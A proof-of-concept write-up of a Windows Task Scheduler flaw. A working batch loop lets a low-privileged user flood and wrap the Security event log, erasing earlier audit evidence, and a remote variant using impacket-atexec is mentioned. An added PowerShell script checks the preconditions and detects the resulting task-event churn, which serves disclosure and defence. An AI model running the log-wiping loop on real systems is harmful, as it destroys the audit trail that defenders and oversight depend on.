By Ruben Enkaoua and Cymulate
Original Blog: Task Scheduler New Vulnerabilities
An attacker can register a task from a roughly 5 KB XML file (see TaskScheduler-Logs-Tampering) as a low-privileged user with a valid password. The task will not run, but the registration is still audited: each attempt writes an event of about 3500 bytes into Security.evtx, carrying the task content. Because Security.evtx is configured by default as a circular log of at most 20 MB, repeating the register/delete cycle a few thousand times pushes every earlier event out of the log, erasing whatever evidence it held.
The vulnerability can also be triggered remotely by patching the author entry in the XML task definition that impacket-atexec sends over RPC.
Requirements
- An unprivileged user account under which the task is registered
- A valid password for that account, so that the XML task is registered even though an error is returned
- The security policy "Audit Other Object Access Events" enabled (this is the subcategory that records scheduled-task creation and deletion)
Run the script
# Clear the Security log first, so that the only event it holds is the "Clear Log" event (EVENT ID 1102); the test is whether that event gets overwritten.
# Check that the 1102 event has been generated in the Security.evtx database
wevtutil qe Security /q:"*[System[EventID=1102]]" /f:text
@echo off
rem Replace <user> and <password> with an unprivileged account and its valid password.
rem Each iteration registers the task (an error is returned, but the audit event is still
rem written with the full task XML) and then deletes it, writing a second event.
rem 2280 iterations are enough to cycle a 20 MB Security log with a ~5 KB task XML.
for /l %%i in (1,1,2280) do (
    schtasks /create /tn poc /xml poc.xml /ru <user> /rp <password> >nul 2>&1 & schtasks /delete /tn poc /f >nul 2>&1
)
echo OK
Check the logs
# Check whether the 1102 event still remains in the Security.evtx database
wevtutil qe Security /q:"*[System[EventID=1102]]" /f:text
# If the result is empty, the Security.evtx database has been overwritten.
# Note: this relies on the default retention setting ("Overwrite events as needed"). A Security log configured to archive when full, or not to overwrite events, keeps the 1102 event and the technique fails.
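The following PowerShell script is an added example and is not code from the original repository or blog. It automates the pre-flight checks implied by the requirements above (audit subcategory, log size, retention mode), estimates the loop count the batch file needs from your own poc.xml, and shows what a defender would hunt for afterwards: a burst of 4698 (task created) / 4699 (task deleted) events for one user and task name, and a Security log whose oldest surviving event is only minutes old. The 1 KB per-event overhead in Get-IterationEstimate and the 50-events-per-5-minutes threshold in Find-TaskChurn are assumptions, not measured values; run it from an elevated session, since both auditpol and the Security log require it.

```powershell
# Added example, not part of the original PoC. Run elevated.

function Test-TamperingPreconditions {
    # 4698 / 4699 are logged under the "Other Object Access Events" subcategory.
    $row = auditpol /get /subcategory:"Other Object Access Events" /r |
           ConvertFrom-Csv | Select-Object -First 1
    $cfg = Get-WinEvent -ListLog Security          # exposes MaximumSizeInBytes and LogMode
    [pscustomobject]@{
        AuditSetting      = $row.'Inclusion Setting'                # "No Auditing" => nothing is written
        AuditEnabled      = ($row.'Inclusion Setting' -ne 'No Auditing')
        MaxSizeBytes      = $cfg.MaximumSizeInBytes                 # 20 MB by default
        LogMode           = $cfg.LogMode                            # Circular = "Overwrite events as needed"
        OverwriteWhenFull = ($cfg.LogMode -eq 'Circular')           # Retain / AutoBackup defeat the technique
    }
}

function Get-IterationEstimate {
    param(
        [Parameter(Mandatory)][string]$TaskXmlPath,
        [long]$MaxSizeBytes = (Get-WinEvent -ListLog Security).MaximumSizeInBytes,
        [int]$PerEventOverhead = 1024   # assumed fixed overhead per event beyond the task XML
    )
    # The batch loop writes one create and one delete event per iteration, each carrying the XML.
    $xmlBytes = (Get-Item -LiteralPath $TaskXmlPath).Length
    [math]::Ceiling($MaxSizeBytes / (2 * ($xmlBytes + $PerEventOverhead)))
}

function Find-TaskChurn {
    param(
        [datetime]$Since = (Get-Date).AddHours(-24),
        [int]$WindowMinutes = 5,
        [int]$Threshold = 50            # assumed: events per user+task per window; tune to your estate
    )
    $filter = @{ LogName = 'Security'; Id = 4698, 4699; StartTime = $Since }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    $windowTicks = [timespan]::FromMinutes($WindowMinutes).Ticks
    $rows = foreach ($e in $events) {
        # Pull fields by name from the event XML; positional Properties[] indexes differ per event ID.
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time   = $e.TimeCreated
            Id     = $e.Id
            User   = '{0}\{1}' -f $data.SubjectDomainName, $data.SubjectUserName
            Task   = $data.TaskName
            Bucket = [math]::Floor($e.TimeCreated.Ticks / $windowTicks)
        }
    }
    $rows | Group-Object User, Task, Bucket | Where-Object Count -ge $Threshold | ForEach-Object {
        $first = $_.Group | Sort-Object Time | Select-Object -First 1
        [pscustomobject]@{
            WindowStart = $first.Time
            User        = $first.User
            Task        = $first.Task
            Events      = $_.Count
        }
    }
}

function Get-SecurityLogAge {
    # After a successful overwrite, the oldest event left in a 20 MB log is only minutes old.
    $oldest = Get-WinEvent -LogName Security -Oldest -MaxEvents 1
    (Get-Date) - $oldest.TimeCreated
}

Test-TamperingPreconditions
Get-IterationEstimate -TaskXmlPath .\poc.xml
Get-SecurityLogAge
Find-TaskChurn | Format-Table -AutoSize
```

Because the overwrite leaves the log full of the attacker's own 4698/4699 pairs, the churn is visible even after the original evidence is gone; forwarding the Security log to a collector before it wraps is the only way to keep the events it displaced.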
This code is for educational and research purposes only.
The author takes no responsibility for any misuse of this code.